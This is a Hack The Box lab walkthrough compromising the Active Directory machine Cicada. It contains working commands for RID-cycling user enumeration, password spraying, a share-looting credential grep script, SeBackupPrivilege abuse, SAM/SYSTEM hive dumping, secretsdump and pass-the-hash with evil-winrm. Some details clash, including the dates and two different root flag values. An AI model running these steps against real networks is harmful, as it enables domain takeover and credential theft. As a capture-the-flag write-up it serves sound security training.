
Hack The Box Write-Up Cicada

About Cicada

In this post I'm writing a write-up for the machine Cicada from Hack The Box, an online platform for training ethical hacking and penetration testing skills.

Cicada is rated 'Easy'. Submitting the user.txt flag is worth 10 points and submitting the root flag is worth 20.

Machine Info

Machine Name: Cicada
Difficulty: Easy
Points: 20
Release Date: 07 Nov 2020
IP: 10.129.231.149
Creator: theblxckcicada

Recon

Portscan with Nmap

As always, we start this machine with an Nmap port scan: default scripts (-sC), version detection (-sV), and all output formats written under ./nmap (-oA).

```console
$ nmap -sC -sV -oA ./nmap/10.129.231.149 10.129.231.149
```

The results.

```console
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 05:23 CST
Nmap scan report for 10.129.231.149
Host is up (0.075s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-19 18:24:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-11-19T18:24:48
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.05 seconds
```

The combination of DNS, Kerberos, LDAP/LDAPS, the global catalog on 3268/3269, SMB and kpasswd is the profile of a domain controller: the host is CICADA-DC in the domain cicada.htb. Two details from the host scripts matter later. SMB message signing is required, so NTLM relay against this host is not an option, and the clock skew of almost seven hours will make Kerberos authentication fail until the attack box clock is synced with the DC. Add cicada.htb and cicada-dc.cicada.htb to /etc/hosts before continuing, since the tools below use the names.

Enumeration

rpcclient

Connect with rpcclient as the guest account, which has an empty password. ANONYMOUS LOGON also works, but with more limited access.

```console
$ rpcclient --user GUEST --password="" cicada.htb
```

First check which account we are connected as. lookupnames returns the full SID of GUEST; everything before the final RID (501) is the domain SID, and with that known we can resolve the well-known RIDs 500 (Administrator) and 502 (krbtgt). The same lookup, run over a whole range of RIDs, will enumerate the remaining accounts later on.

```console
rpcclient $> lookupnames GUEST
GUEST S-1-5-21-917908876-1423158569-3159038727-501 (User: 1)
rpcclient $>
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-500
S-1-5-21-917908876-1423158569-3159038727-500 CICADA\Administrator (1)
rpcclient $>
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-502
S-1-5-21-917908876-1423158569-3159038727-502 CICADA\krbtgt (1)
```

That gives us the domain SID S-1-5-21-917908876-1423158569-3159038727 and three accounts so far: Administrator, Guest and krbtgt.

smbmap

Next, list the SMB shares the guest account can see with smbmap.

```console
$ smbmap -H cicada.htb -u "guest" -p ""
[+] IP: cicada.htb:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        SYSVOL                                                  NO ACCESS       Logon server share
```

Guest can read HR and IPC$, while DEV, NETLOGON and SYSVOL are closed to it. Connect to the HR share.

Found the file `Notice from HR.txt`.

```console
root@htb-1d522eiiwk:/home/t13nn3s/my_data# smbclient //cicada.htb/HR --user guest --password ""
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 07:29:09 2024
  ..                                  D        0  Thu Mar 14 07:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 12:31:48 2024

                4168447 blocks of size 4096. 439288 blocks available
smb: \>
```

Download the file.

```console
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (38.6 KiloBytes/sec) (average 38.6 KiloBytes/sec)
```

Check the contents of the file.

```console
$ cat Notice\ from\ HR.txt
```

The contents:

```text
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp
```

Nice! We found the default password Cicada$M6Corpb*@Lp#nZp!8

User enumeration

We now only need usernames to test the default password against. The domain SID is known from the lookupnames output, so a small bash loop asks rpcclient to resolve every RID from 500 to 4000 (RID cycling). Resolved objects are printed with their type in parentheses and unused RIDs come back as *unknown* (8), so filtering for type (1) keeps only user accounts.

```bash
for i in $(seq 500 4000); do
    rpcclient --user "GUEST" --password="" cicada.htb -c "lookupsids S-1-5-21-917908876-1423158569-3159038727-$i" | grep "(1)";
done
```

After running the script, we have the following usernames:

```text
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
```

Testing the default password against each of these users with smbmap shows that it still works for michael.wrightson. Unlike guest, this account can also read NETLOGON and SYSVOL.

```console
$ smbmap -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -H cicada.htb
[+] IP: cicada.htb:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
```

We first tried to open a WinRM session as michael.wrightson, but the account has no permission to log in that way. Since we now have valid domain credentials, we can collect the Active Directory objects with bloodhound-python and look for a path in BloodHound.

```console
$ bloodhound-python --domain cicada.htb -c all -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -dc cicada-dc.cicada.htb -ns 10.129.231.149 --dns-tcp
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 02S
```

The Kerberos warning is the seven-hour clock skew Nmap reported: a DC rejects tickets from a clock more than five minutes off (KRB_AP_ERR_SKEW). bloodhound-python falls back to NTLM, so the collection still succeeds; for any Kerberos-only step later, sync the attack box clock with the DC first (ntpdate, or run the tool under faketime).

In BloodHound, the user account emily.oscars is a member of the group REMOTE MANAGEMENT USERS@CICADA.HTB, so that account is allowed to log in over WinRM.

Hack The Box Write-Up Cicada by T13nn3s Bloodhound Output

After further analysis of the members of the group [email protected] we can

Hack The Box Cicada Write-Up by T13nn3s password of david.orelious

The screenshot shows the password aRt$Lp#7t*VQ!3, which belongs to the user david.orelious.

With these credentials we restart the SMB enumeration. david.orelious can additionally read the DEV share.

```console
$ smbmap -H cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'
[+] IP: cicada.htb:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     READ ONLY
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
```

Connect to the DEV share. It holds a single interesting file, Backup_script.ps1, which we download.

```console
$ smbclient //cicada.htb/DEV --user david.orelious --password 'aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 19:28:22 2024

                4168447 blocks of size 4096. 424721 blocks available
smb: \> mget Backup_script.ps1
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,9 KiloBytes/sec) (average 3,9 KiloBytes/sec)
smb: \>
```

Contents of the script. It builds a PSCredential for emily.oscars from a hardcoded cleartext password before zipping C:\smb into D:\Backup.

```powershell
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
```
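Both credentials so far came out of files sitting on shares (the HR notice and this backup script). The following added example, my own code rather than anything from the original write-up, mirrors a readable share with smbclient and then sweeps the downloaded files for lines that typically carry cleartext secrets. It assumes smbclient is installed and cicada.htb resolves; the share, account and password names are the ones found above, and the regular expression is a starting point that will also flag harmless sentences such as "your password is a crucial aspect", so review the hits by hand.

```bash
#!/bin/sh
# Added example, not part of the original write-up: mirror an SMB share and
# sweep the loot for credential-looking lines.
# Assumptions: Samba's smbclient is installed and cicada.htb resolves to the DC.

DC="cicada.htb"
LOOT="${LOOT:-./loot}"

# Mirror one share into $LOOT/<share>. "recurse ON; prompt OFF" makes mget walk
# subdirectories without asking for confirmation on every file.
dump_share() {
  share=$1 user=$2 pass=$3
  mkdir -p "$LOOT/$share"
  ( cd "$LOOT/$share" && \
    smbclient "//$DC/$share" -U "$user%$pass" -c 'recurse ON; prompt OFF; mget *' )
}

# Lines that tend to carry cleartext secrets: "password is:" / "password =",
# PowerShell SecureString or PSCredential construction, cmdkey, net use /user.
CRED_PATTERN='(password|passwd|pwd)[^a-z]{0,3}(is|=|:)|ConvertTo-SecureString|PSCredential|cmdkey |net use .*/user'

# Print file:line:text for every hit under a directory. The exit status is
# grep's (1 when nothing matched), so callers can branch on it.
find_creds() {
  grep -rEIin -e "$CRED_PATTERN" "$1"
}

# The network steps only run on demand, e.g.
#   sh loot.sh guest '' HR
#   sh loot.sh david.orelious 'aRt$Lp#7t*VQ!3' DEV
if [ $# -ge 3 ]; then
  dump_share "$3" "$1" "$2"
  find_creds "$LOOT"
fi
```

Loot lands under ./loot/<share> with the share's directory layout intact, so a hit's path in the find_creds output doubles as the evidence reference for the report.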

The script contains the cleartext password of emily.oscars, and BloodHound already told us she is in Remote Management Users, so we can open a WinRM session with evil-winrm.

```console
$ evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
```

Read the user flag.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ls


    Directory: C:\Users\emily.oscars.CICADA\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        11/30/2024   9:29 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
ce92f2c2963fea6d4308b59a36eb2dae
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
```

Privilege Escalation

Enumeration

whoami /priv shows that emily.oscars holds SeBackupPrivilege and SeRestorePrivilege, both enabled. SeBackupPrivilege lets a process open any file for reading with backup semantics, bypassing its NTFS ACL, which is enough to read anything on the box, including the Administrator's files and the registry hives.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

Upload the two DLLs of the SeBackupPrivilege PowerShell module (SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll from github.com/giuliano108/SeBackupPrivilege) with evil-winrm's upload command.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll

Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll

Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!
```

Import the modules and copy the root flag out of the Administrator's desktop. Copy-FileSeBackupPrivilege opens the source file with backup semantics, so the ACL that keeps emily.oscars out of C:\Users\Administrator does not apply.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege 'C:\users\administrator\desktop\root.txt' .\root.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type root.txt
9668a9dbfd79509169398cbe43f4151a
```

Dump the SAM and SYSTEM hives

Reading root.txt is enough for the flag, but the same privilege also gets us a real Administrator session. reg save needs SeBackupPrivilege to export the SAM and SYSTEM hives, and with both files we can extract the local password hashes offline. One caveat on a domain controller: the SAM only holds the local accounts (its RID 500 entry is the DSRM administrator), while domain accounts live in NTDS.dit. On this box the local Administrator hash turns out to match the domain Administrator, so it is enough; otherwise the same privilege would let us back up NTDS.dit (diskshadow or wbadmin) and feed that to secretsdump instead.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam

Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system

Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
```

Run secretsdump against the two hives locally.

```console
$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```

The Administrator entry gives us the NT hash 2b87e7c93a3e8a0ea4a581937016f341 (the LM part, aad3b435b51404eeaad3b435b51404ee, is the placeholder for an empty LM hash). No cracking is needed: evil-winrm accepts the NT hash directly with -H, so we pass the hash and read the root flag.

```console
$ evil-winrm -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
3cbbc6b21aaa327e9f98355c30e09de5
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```

We have owned CICADA!

Thanks for reading this write-up! Did you enjoy it, or learn something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.